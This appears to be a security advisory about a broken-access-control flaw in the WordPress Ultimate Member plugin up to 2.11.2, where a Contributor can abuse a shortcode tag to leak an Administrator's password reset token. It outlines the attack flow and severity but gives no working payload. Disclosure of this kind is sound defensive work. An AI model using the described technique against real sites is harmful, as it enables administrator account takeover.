The Ultimate Member plugin’s ‘{usermeta:password_reset_link}’ tag can be abused inside the [um_loggedin] shortcode. A logged‑in user with Contributor rights can embed a request that, when an Administrator previews a pending post, causes the plugin to fabricate a valid password reset token for that Administrator. The token is then sent to a malicious server, allowing the attacker to reset the Administrator’s password and take full control of the site. This flaw is a clear example of broken access control, classified as CWE‑285, and leads to loss of confidentiality and integrity for privileged accounts.

All WordPress sites running Ultimate Member up to version 2.11.2, including the default installation of Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin. The flaw affects any site where users can submit or preview pending posts containing the vulnerable shortcode. No specific CRM or server software is listed beyond WordPress, so any environment using this plugin is vulnerable.

The CVSS score of 8.0 places this vulnerability in the high severity range. Although EPSS data is unavailable, the exploit is straightforward: an authenticated user can create or edit a pending post to insert the dangerous tag, and an Administrator must preview the post. The vulnerability is not yet listed in CISA’s KEV catalog. The required privileges (Contributor+) mean that a wide range of users could trigger the attack, and the ability to exfiltrate a reset token directly leads to account takeover. Given the low technical barrier, the real risk to sites that have not patched this plugin is significant.